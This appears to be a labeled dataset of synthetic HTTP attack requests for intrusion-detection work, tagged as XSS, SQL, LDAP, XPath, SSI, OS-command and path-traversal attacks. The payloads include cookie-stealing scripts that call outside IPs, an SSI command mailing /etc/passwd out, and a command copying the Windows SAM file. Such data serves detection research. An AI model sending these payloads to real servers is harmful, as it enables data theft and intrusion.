If-Unmodified-Since: Fri, 16 Jan 09 14:14:54 GMT
If-Match: "s7b7MVjb72gaeV.54hD"
If-None-Match: *
If-Range: *
Max-Forwards: 88
MIME-Version: 4.9
Pragma: i=o5fs
Proxy-Authorization: Basic dHJ4ZTg4OmlvRnM=
Authorization: NTLM c0N0OXk2dGlnYTZtZEVuRVRob3plNXZlaXNsTGlneGdhd3hoZXZt
Range: 7-,-18566
Referer: http://www.EaJatatw.be/eezreeH.asp
TE: chunked;q=0.0,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/7.3 (Machintosh; U; Mac OS X 3.3; No-En; rv:6.7.2) Gecko/71916722
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: 9idere/1.6 190.7.161.71:54757, FTP/9.9 34.35.147.201, FTP/3.7 218.153.178.54
Transfer-Encoding: eenbH; ysete=etomFen
Upgrade: eTere/4.3, ulLei/2.8
Warning: 084 236.106.31.192:22 "edNteueotaOrbpOeua" "Thu, 03 Jun 04 03:45:24 GMT"
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47576
Start - Id: 48054
class: XSS
GET /eraaahuuxisisobdat/Ti/hsdt8yaq/o4H7p0vkYFOvz8AAIrSU/lk/aez7ac8eo.pl?tl6ltdeh=6328807&1a=7566635&oMgmsgenbmr=%3Cdiv++onmouseover++++%3D+%22+++%5Bwindow.open%28%27http%3A%2F%2F101.236.48.244%2Ftras.asmx%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&cleoeltq9td=175068308&rapxeToTNn=e&mpdcsuate=+qe+93xteRe&meta9e9Gstyle=256410&rsu6h3gnocE=17019&aiceinmyyd=8hadFhloosotn&zTcat3sSwKC=802451&ge=imgtNSdweeiR&W9jV=acceptstmpusrs&icronm5di=85888&3Cml3lM_0=tstm&Ait5neal=j%3E HTTP/1.1
Host: 132.199.91.186
Connection: onheaene
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate;q=0.2
Accept-Language: *
Cache-Control: min-fresh=617
Client-ip: 53.78.113.149
Cookie: hn4dnc=x ]tihluJE$boot.iniy?;Xn5RRMselect_7a=2s;4passthru0qX6qsservices=lpmDnb0eOlndnt;Cifs=16382;Ysa1ch=9cla0qn+;eaAfswoAraeorsu=soptY
Cookie2: $Version="1"
Date: Fri, 12 Jun 09 23:24:52 CET
ETag: W/"oUy6u7s.QlnBwlHHu"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: agsv@hn76ev.st
If-Modified-Since: Fri, 19 Jun 09 11:15:13 UTC
If-Unmodified-Since: Wed, 10 Jun 09 18:36:55 CET
If-Match: "5-WC9.pKi3PmZ_j"
If-None-Match: *
If-Range: "cZHtmyxZiO2T.0FfJn_"
Max-Forwards: 0067
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: eofH ewreea=Anton
Authorization: nrsO grats=oecceisw
Range: 16-601
Referer: http://www.aeiwu.ch/ohHc9rg/snzwr/fethe.gif
TE: trailers
Trailer: Accept-Charset
User-Agent: arRuw (n46ssGaX7; 2Nu8LSczlg; uGwWEKIy; oP_ruceQsd)
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6153x685
Via: 1.0 www.wreqh.htm, FTP/7.4 www.dj80.js
Transfer-Encoding: btwm; Tymvo=ozj6oq
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 142.37.94.150
X-Serial-Number: 405569074263988888
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48054
Start - Id: 38930
class: LdapInjection
GET /mOL_vq/lyb83rcpDncbwkdhx9/sTmmkt@b/sm8bvF8-ksBkD3I0z.png?sbaeeftnjmi=hhoS%7Coueob&tpcleibcigN=%5B&draies=0600&fdm2xieeIoHndl=7&jm69H4=tlof&ar=onodntsRzeix&qHA7e@-JPHG=%29%28++%7C++%28displayName%3Dhad*%29++%28name%3D+++had*+%29%28+mail%3Dhad*+++%29&nstrjr8oxvdatio=153157 HTTP/1.1
Host: 55.76.6.97:80
Connection: leio
Accept: video/mpeg, application/x-tar;q=0.3, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 200.234.213.150
Cookie: e0eh59hhdDe=cMX25Mo5
Cookie2: $Version="0"
Date: Mon, 22 Jun 09 10:27:45 UTC
ETag: "eEIaAeCLc.OCQI1"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Tue, 13 Feb 07 18:05:52 UTC
If-Unmodified-Since: Thu, 21 Sep 06 10:31:52 UTC
If-Match: *
If-None-Match: "BiMXICoHQdTSHQ0_R"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: Digest response="AA6f35BFcE979e200Fe7DEbDCF7Aba9b"
Range: 272257-3
Referer: http://www.ltdyw.net/qGje/e8eo6ns/euh2dti/s7df6lps.mpeg
TE: trailers,trailers
Trailer: Host
User-Agent: 1UMBMcA http://www.d4hi.fr
UA-CPU: Sparc
UA-Disp: 903,194,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 024x188
Via: 7.4 www.najSe.html, FTP/8.8 36.81.196.15, HTTP/6.8 www.5sineti.jpg:931
Transfer-Encoding: identity
Upgrade: mneSso/4.0, Ean/1.8
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38930
Start - Id: 38093
class: LdapInjection
GET /3SBqYMS9S4/uarimad/i3gSroaosizsoll2ibb/spe9ioa/dU7jTu4/NreacHragloSggfane/bb9rhifbEiumaxheir/sA_4a.bin?liiaql7bnc=edog1nnaAtattue&mcsiMgl5b=njFg0KFf.IBn&Ia0l=%26TsE&hhir3est9enoio=%29+%28++%7C++%28displayName%3Dhad*%29+++%28name%3D+++had*+%29%28mail%3Dhad*++%29&gponlrpcMqf=hnu0r&a5=62505126&ACono=213&ocxeyecxrsp=0164613345 HTTP/1.1
Host: www.Knnm.com:80
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=20099
Client-ip: 209.94.206.107
Cookie: 3yy8=- c
Cookie2: $Version="74"
Date: Mon, 20 Mar 06 15:25:14 GMT
ETag: W/"ffkCjKJgxmCrLpG"
Expect: 100-continue
From: oaitn@wnslnp.com
If-Modified-Since: Mon, 27 Aug 07 24:58:53 CET
If-Unmodified-Since: Sat, 03 Feb 07 07:20:13 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Nov 09 03:06:26 CET
Max-Forwards: 1970
MIME-Version: 3.0
Pragma: 2eiNanEg=sena7dln
Proxy-Authorization: atswre uFty=o9ssf
Authorization: Digest uri=http://www.d6to.org/Neohepe/nearo/esAoni.doc
Range: 943633-,-798,-667
Referer: http://www.ouseioaw.it/lsbla/T8pevert.tar
TE: deflate,trailers
Trailer: Pragma
User-Agent: deMedi
UA-CPU: 68000
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3700x2595
Via: 1.0 81.223.53.197, HTTP/5.2 www.IeeEe.jpg, HTTP/6.6 98.168.5.53
Transfer-Encoding: 4nis; ohirt=itsrh2
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 525 www.tntaivc.png "taaisanteflseGtnsd" "Thu, 10 Jun 04 12:50:10 UTC"
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 814494240740
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38093
Start - Id: 42866
class: OsCommanding
GET /aiBSoN/o0r/ennuiPnssK1e6cn2ed/la.mCi1P1ZmD.JOy/leb7saziiexlpn0ntei7/s@EEYkJd.gfN6HcV.6/Lrtmeermo/rhbamndit/dE2itEabereItwsenmdw/uuse0mlde.shtml?Ntn=execro&lqhcseuh=1&3UMrZKz-G=d7VZQf&eocurSeS=a%7Ees&Riet=198.70.190.243++%7C++copy+c%3A%5Cwinnt%5Crepair%5Csam._+c%3A%5Cinetpub%5Cwwwroot%5Csam.ddd&e9bnTs4etsfieho=5586510&UrcOrtSkYael=%24t&ennobE8I=8001225&snegw=+qiZois+%3Cnt HTTP/1.1
Host: 137.84.17.64:68105
Connection: keep-alive
Accept: text/*, video/quicktime
Accept-Charset: x-mac-roman;q=0.2, cp-950;q=0.6, cp-932, x-mac-arabic
Accept-Encoding: 
Accept-Language: dv9-aue9nt, 1a-o, ifr-samelgx;q=0.5, pcrRr-6w7han;q=0.0
Cache-Control: no-store
Client-ip: 4.100.41.101
Cookie: eI4ibe=alpt
Cookie2: $Version="28"
Date: Tue, 27 Nov 07 23:46:06 CET
ETag: "7bCKFYFgjePn3tYHUg"
Expect: 100-continue
From: seEq2z@qtlvmnTeI.be
If-Modified-Since: Sat, 18 Nov 06 16:07:26 GMT
If-Unmodified-Since: Thu, 17 May 07 03:50:25 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Feb 07 15:18:40 CET
Max-Forwards: 306
MIME-Version: 9.4
Pragma: aat=av3ee
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: Basic bGVjczo5d3NPZkU=
Range: -64,-955
Referer: http://enidqils.uk/iStl.png
TE: deflate;q=0.8,trailers
Trailer: Via
User-Agent: S4C4adlHt (dOrCp9vf; nD39zgq0w; k66w0eoSQ)
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: FTP/4.5 www.e0sieaZ.jpg
Transfer-Encoding: ehna; 9x6nd=eghuec
Upgrade: inro/3.8, aXsnrs/2.9
Warning: 323 162.27.151.212 "63fpil54l" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42866
Start - Id: 36322
class: PathTransversal
GET /clsqoeeibae1ria2.js?temlrsPi=iyvPTZNS-L&diuibi=mhlike6&ReOdgnncAa=%2Fetc%2Fpasswd HTTP/1.1
Host: www.3oin.st
Connection: cwthmeh
Accept: */*
Accept-Charset: windows-1250;q=0.3, utf-7, koi8, ks_c_5601-1987;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 227.250.97.152
Cookie: a7jnrgrgu2Y=tsfaeetn;bin1twuF=bElLvyXxo;zsnpstn3eaart=0;P4gxstyleDIl@b=ksnsSC|razru%li5~ w;edehy=0
Cookie2: $Version="21"
Date: Thu, 03 Jun 04 05:00:20 GMT
ETag: W/"XVnSSkhMGncEq258"
Expect: eyzT
From: 5ygo@eiccrasaq.org
If-Modified-Since: Fri, 13 May 05 14:06:49 CET
If-Unmodified-Since: Fri, 29 Aug 08 03:29:59 CET
If-Match: "O1wyZemSQkBVGoIci"
If-None-Match: *
If-Range: "B@RpB24hyMdcOlcD"
Max-Forwards: 31
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic aTFhdGw6bmFhc0ZIZWE=
Authorization: shamo iayeo4ls=unnxto8
Range: -399013
Referer: http://a93hlic.org/oSR8/SBeh/axnse/tseton/kegobias.dll
TE: trailers,chunked
Trailer: User-Agent
User-Agent: fTncdce http://www.ioie5eua.org
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 625x983
Via: 0.6 209.184.122.136:44654, FTP/9.5 www.nwomeWer.jpg, deh/2.2 www.ttsxys.shtml
Transfer-Encoding: gzip
Upgrade: cdl/2.8, oueiab/2.3, nfnoc/8.1
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 10989646571343616
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36322
Start - Id: 38260
class: LdapInjection
GET /sicahiorSu/d-KW6@i/dn/neStEb.exe?9hreia=piO9dDbBfIO&sebEaElicek=insertrno&D4execus1HA-WU=8000708&aobelEsHef=82009840&fiamczxiNtepd=oqn50+gm+&sv8ew=%29++++%28++%7C++%28++++cn%3D*o++%27brien*+%29%28mail+++%3D*o+++%27brien*++%29+ HTTP/1.1
Host: 82.12.67.55
Connection: kwoobne
Accept: image/*;q=0.1, video/*, audio/x-wav
Accept-Charset: iso-8859-7, x-mac-japanese;q=0.0, x-mac-greek
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=40
Client-ip: 113.81.106.78
Cookie: Urq=9154;Ka=tenzihrrr82tVvu9;trfr6ny=spj5nviw;wglnL0acr=08879;hiav=htbpesei3iinssOrc
Cookie2: $Version="57"
Date: Fri, 05 Feb 10 20:07:50 GMT
ETag: W/"vtsbqI40-WbGIOGz"
Expect: 52cde=otinosw
From: Eorust@uthn0.it
If-Modified-Since: Thu, 22 Mar 07 03:57:39 UTC
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Feb 06 04:20:33 UTC
Max-Forwards: 3758
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: NTLM c0ZnZ3duamg3eW9oanN0bXNuZGVzbHN0dG9uYW4yb3VJdHVqUGJ0d29tc2hl
Range: -23
Referer: http://www.oTisasn.org/aegd/eet9a.jpg
TE: gzip,deflate;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: yb7Nfzlgc6tndonjero
UA-CPU: PowerPC
UA-Disp: 087,798,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 5.6 www.hety.css, 0.4 97.201.217.41:83070, aad/6.8 www.vmaei.gif
Transfer-Encoding: tdia8
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38260
Start - Id: 40059
class: SSI
GET /CQjGFxt3KK/0c/2UfO@NpnVE3ORfkL/ysahkK/LnZ6BPkand1t/aHDBlWapnd.B9q8/busrFusr/egVHxsi9WLG0wSpzvi6.msf?Rmos4h=ecbtv&eLctiiystan=nDW7&sri=%3C%21--+++++%23exec+++cmd%3D%22%2Fbin%2Fmail++++t4hs.com++++%3C+++++%2Fetc%2Fpasswd%22--%3E&iiedriO=14609938&it8ru13hg0xsit=%7Eorebogl&Ul5suayseaw=VoToynteliaptoe HTTP/1.1
Host: 110.97.193.154
Connection: close
Accept: video/mpeg;q=0.0, video/*, image/png;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 49.156.66.129
Cookie: 2mwcmOKnKEHe=pelogmhs
Cookie2: $Version="57"
Date: Fri, 06 Jan 06 14:00:49 GMT
ETag: W/"kZJu3IoTYGcSKFBiD@c"
Expect: ursla2l
From: atth5@DlahcYr4ai.cz
If-Modified-Since: Fri, 30 Apr 04 12:49:37 CET
If-Unmodified-Since: Mon, 07 Jul 08 13:22:33 CET
If-Match: *
If-None-Match: "_YaU.F4EyvQ9@zdv0"
If-Range: "2xVwbdu7L_p3UgWPX6S8"
Max-Forwards: 173
MIME-Version: 3.6
Pragma: e='lat'
Proxy-Authorization: NTLM bmVtZWRlNGJvcG1nc2VNY3Z2ZWU0ZWI0c29sYXRuRW0xb2hzbjBrZ3Rzcw==
Authorization: NTLM bmxub0pkRHN3ZHRuYWlsYXJ0dXIzbm9udGNNNmlpcm9oaGlmcmVyNmVpZEFTc2ll
Range: 8082-34430,77209-030140,-38
Referer: http://etoosliw.fr/utfnq/Oyoee/doetd/I67rihna/iNra.txt
TE: chunked;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/6.7 (X11; U; Open BSD i586 1.9; ma-n3; rv:7.9.0) Gecko/91765388
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8002x1361
Via: FTP/7.2 www.qspe.jpg, FTP/7.1 www.tuee9.jpg, HTTP/8.9 www.eeiga.png
Transfer-Encoding: stnnvl
Upgrade: eyee/8.5, tmg/7.0
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 67.12.1.93
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40059
Start - Id: 35126
class: SqlInjection
POST /u7x8/cumsntAm/seboawdhx/rbdNcgeRd/fNratheEglhenenhe.pl? HTTP/1.0
Content-Length: 351
Content-Language: llr
Content-Encoding: deflate
Content-Location: http://www.qieenyy.gov/9i8got/itrs2.jpeg
Content-MD5: ZTJobDRjZUV0bmlldGE2bA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 May 06 06:11:05 CET
Last-Modified: Tue, 20 Feb 07 19:13:56 CET
Host: www.atooSMes.st
Connection: mlAer0
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 86.214.16.25
Cookie: n2p=4nnnEtkh8owmmEtnx;es=y3l/-e$1ctcvarel;eqQ_-F=b6BiL;nvwp5c=8<etc
Cookie2: $Version="43"
Date: Thu, 25 Aug 05 22:38:53 UTC
ETag: "wECWPXUQhi-PB9N"
Expect: oenfl
If-Modified-Since: Mon, 30 Mar 09 20:40:59 CET
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Apr 08 12:03:22 CET
Max-Forwards: 47
Pragma: 9wn=6ieFepUa
Proxy-Authorization: Digest cnonce="cejy"
Authorization: gIig oszme7=Efr9
Range: 255878-
Referer: http://www.4Hmo.ch/Bcdab/zhooce/Huu3xixe/deoee/TVsi.htm
TE: trailers,trailers,deflate
User-Agent: o8MaYU-zmE http://www.5emr.org
UA-Disp: 124,974,8
UA-OS: Win98
UA-Color: color8
Via: 6edt/8.1 41.85.213.179, ycee/9.6 www.sisy.shtml
Transfer-Encoding: rdtn
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vdThewnh=3025488234&IwZulocation_=73139&EnmetaPxtm89=451592&i5eHimgWAGzD=aisgolenhp&war499ceesurf=80025459&3di=[E/rr0an&m38QXhKuPB=dFxtvm4fDH&qr31e8zt= z/b&csk=573887144&meeferae=' )/**/UNIONALL/**/SELECT/**/44/**/FROM/**/tNsjuk/**/WHERE/**/(   ''  =    '/**/&rmailGtmp=an5&sAgoau=54157&em1Nnwfc=oin

End - Id: 35126
Start - Id: 42646
class: SqlInjection
GET /sLZ/SFN9ehCUQM.etcn/oz0Jo/ftyNts/ok09s/tacr/t_nyZwlJ5-/sfeld.haC5.8YzxF18/hpo21ebi7e.css?Ndrea=Rid%24&nhyb=lVDG&naurdncrrdoe=4so6i8iam&86Gcmetaokf._1=ryedtioemlgwi&9Ta9sitleldc=I%29b&uea=+ti&atn=OR++%27apoh%27++IN+++%28++%27++%27+++%29 HTTP/1.0
Host: www.Reb3.biz:05283
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-9, isiri-3342;q=0.8, windows-1252;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=793
Client-ip: 75.23.100.154
Cookie: EnullC1TzJreplaceg=83oM
Cookie2: $Version="792"
Date: Mon, 04 Aug 08 07:00:48 CET
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Wed, 26 Dec 07 17:20:41 UTC
If-Unmodified-Since: Thu, 13 Jul 06 14:40:50 GMT
If-Match: "ExamKPEtgjPtMRyFq"
If-None-Match: "EWA4XuiOH33TCLJY@uJ3"
If-Range: Mon, 25 Oct 04 07:51:24 GMT
Max-Forwards: 606
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nonce
Range: -5
Referer: http://aaitpp.fr/bstnp/wguLd.php4
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.4 (X11; U; Linux i386 4.9; ir-ba; rv:3.5.3) Gecko/12303481
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: FTP/0.7 136.93.198.77:38
Transfer-Encoding: gzip
Upgrade: eyy/2.8, zqo/4.6, tfea/5.6, tnwsfs/8.5, Iut/4.9
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42646
Start - Id: 49989
class: XPathInjection
POST /e9q/eoit8sa.gif? HTTP/1.0
Content-Length: 104
Content-Language: mo9
Content-Encoding: deflate
Content-Location: /x6qst2/eek1el/aigli/laon.rar
Content-MD5: ZWtuaEFydGFhRW56bmRjYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Dec 09 06:24:04 UTC
Last-Modified: Thu, 31 Dec 09 12:12:52 GMT
Host: www.decz9fw.de
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, gzip, identity;q=0.8, deflate;q=0.9
Accept-Language: dsriA'  or    (i   <    count(iwIhus/child::text())   and    j   <     count(enh/child::comment()) and   k <     count(llZea/child::*) )    or  'txni'  =    '  neenc2' or
Cookie: mkv=qi;Xrl2nE5MtYbody=d8Iy_YtyRh
Date: Mon, 24 Oct 05 12:08:12 CET
Expect: aef0
From: Hrtiy@r0sqSkft.de
If-Modified-Since: Fri, 13 Oct 06 14:31:55 GMT
If-Unmodified-Since: Wed, 07 Apr 10 19:55:59 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 658
Pragma: anhe8=t9eenaos
Referer: /ezmdbjs.mp3
TE: deflate;q=0.2,deflate;q=0.1
User-Agent: Mozilla/0.3 (Machintosh; U; PPC 8.1; ea-e8; rv:0.4.2) Gecko/51840497
UA-CPU: x86
UA-Pixels: 431x444
Via: FTP/3.2 www.gy3nsTtT.jpg:67, ikdhxz/5.6 www.detnInl.tiff
Transfer-Encoding: s5h5a; sThu=sqawcods

nh=688822885&sbTPeD=eAca4ehw5mfxba&rdaaht=rnph-sy2&5yhtacces225fwNR0L=2&y4in= ta8uid9&on=e?sslirdtvall

End - Id: 49989
Start - Id: 47423
class: XSS
GET /vop/jV4du3Q/ok/g1CSJdCsWoBexec/tSffH9gK5-LQUmHkFG-/geesta0iziwp5lowne/ibmANvvze0S1c2EBS/z3/hanaq9ztga3e.css?Szn3aan=b&5hhTrna4yyi=096&9aoO8iunb6ile=57900106&rm-B2n@uqu=i3wrupnx5bo0raowbR&s8=eEme77z&n1dm=663072&txttmYdiyanSfe=%3Clink+++rel%3D+++%22+++++stylesheet++++++%22+++++href++%3D++++%22+++javascript%3A%5Bwindow.open%28%27http%3A%2F%2F156.136.215.160%2Fenll.swf%27%2Bdocument.cookie%29%3B%5D++++++++++%22++++%3E&saEkzsowtgusu=6183566869&TWxmC=fV73Bq5Mel%40&aecep=eeng&5gBscriptrwRCh=346349&aralsds5uyro=8&dlhreEisde=5001882021 HTTP/1.1
Host: www.hmsnswm.be
Connection: keep-alive
Accept: text/*;q=0.5, video/*, application/rtf
Accept-Charset: euc-tw, utf-8, windows-1254;q=0.1, isiri-3342;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: 8roeai='2d6a'
Client-ip: 249.196.221.75
Cookie: T9-rT2DLFam=048032;6anNcclm3fS=i-_sogPv.I;6awWM@AsystemHA=0796136852
Cookie2: $Version="552"
Date: Mon, 14 Dec 09 11:34:55 CET
ETag: "uu5StmG6xrhvvzWzIq"
Expect: bnh5u=ermwt
From: nypoxefI@enmcetlyib.com
If-Modified-Since: Thu, 16 Jul 09 02:52:14 CET
If-Unmodified-Since: Fri, 30 Jan 04 07:39:29 CET
If-Match: *
If-None-Match: "Rr1ky._S.gXOe3oNyRaC"
If-Range: *
Max-Forwards: 68
MIME-Version: 0.1
Pragma: eann=bnsn
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: 4tmo hlitorkm=yta6dhse
Range: 40-52491,810751-,61626-565636
Referer: /sSiaehq/48ujtwm/rsdivd.cfm
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (Machintosh; U; Mac OS X 5.5; to-8I; rv:8.6.2) Gecko/32808953
UA-CPU: StrongARM
UA-Disp: 1683,838,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/1.0 233.68.64.123, Tean/8.0 www.n8a4ae.html
Transfer-Encoding: identity
Upgrade: ncm/6.6
Warning: 167 www.osue.shtml "oGfiwotdrontvzljesfb" "Thu, 13 Aug 09 09:38:42 UTC"
X-Forwarded-For: 197.9.22.168
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47423
Start - Id: 40938
class: SSI
GET /idjLJg6mdrU@bhwKA.shtml?io=pse&ifp0yekq6e3e=ho+catt&AMA0u20B2e=%3C%21--++%23odbc++statement%3D++%22select+++++ti%2C+ht%2C++++oEsn+from+++hosewonl++order+++++by+++++8%2C+++780%2C+++++1%22++--%3E&Pu6ybetween7NriJJ=wneMocapsock_streami HTTP/1.1
Host: 79.175.11.109:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: p7aMe-ne, jieYik-u;q=0.6
Cache-Control: only-if-cached
Cookie: Dpaeimut=coh;kMFJnullZT0.kZ1=ogcakcod6iti;setllfsAeht=dt0.cI;4iok59d=zht;wzoaV=l
Cookie2: $Version="722"
Date: Wed, 19 Dec 07 05:59:48 CET
If-Match: *
If-Range: Sun, 30 Sep 07 14:02:29 UTC
Max-Forwards: 7724
Authorization: NTLM aXRzbG5jb2dibGVvc09hcGlpamVsYWJ0ZWVhanBlaGFl
Range: 91020-11,449-,-75945
Referer: http://www.eboFs.uk/cIha/giic/oytaic.wav
TE: deflate;q=0.8,trailers,trailers
User-Agent: Mozilla/5.4 (compatible; ou7Tteo; Win98; senit9rm; EdAazdadt; qgsbholy)
UA-Color: color32
Transfer-Encoding: Tirb
----: ----------

null

End - Id: 40938
Start - Id: 35585
class: XPathInjection
GET /Vn1IOcXaMQc97d/nb/ecmD5br5AlosyAD/dbihT3/uiwM8okprocessing-instructionJf/h.X0XkS4EhqhHk1c7h4m/gjFuZq0sLftKrCNYTL8C/Stjdlteesbiwgecam/_EEd1TTIDTG.html?letcteoH=wp-e0rt%3F%7Crt&tdshcnimlsete=498&ro=2&npUwr=io%2Fipub6inexec&LS5hlsy9shutdownwget1K-=af5omaW4r&riutaJ=qksah&kotmsy7Zt=g0zoonp&sn=tlyN%27++or+++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28++++i++%2Bj+++%2B++k%2Bl++++%2B++1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27t3s%27++++%3D%27++anrlzso%27+++or&NBqEN2j7ek=ne1tnO&js=534441&6ln2rroOreaq=lE6Ui HTTP/1.1
Host: 237.6.197.95
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-turkish;q=0.5
Accept-Encoding: deflate;q=0.5, identity;q=0.9
Accept-Language: w1rCa-sjei;q=0.5, sacalryi-idtsaose;q=0.7, rhtaT-byseeeli;q=0.0, t0tebemt-sOc, mnearesy-mee;q=0.5
Cache-Control: no-transform
Client-ip: 146.199.243.126
Cookie: de=847;S75tRDUDzV=r;tfNOGRcKB=izob
Cookie2: $Version="8"
Date: Sun, 25 Jan 09 22:55:39 UTC
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
From: keef8S@qicoiNe.be
If-Modified-Since: Tue, 22 Nov 05 17:52:05 CET
If-Unmodified-Since: Thu, 02 Feb 06 05:06:50 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Fri, 28 Mar 08 20:25:53 GMT
Max-Forwards: 883
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM OTFsanJtN3JQNWwwbzBwdHNvd2xFd29leXNXbmVPZHVlMXRzbkhvbWZtajZl
Authorization: Basic bnNmc2k6MnAzYWM=
Range: 1278-6
Referer: /ttshihss/aLtto/ARUOGjnt.asmx
TE: trailers,chunked;q=0.7
User-Agent: Mozilla/2.6 (compatible; MSIE 0.2; Open BSD i386; tiihl7)
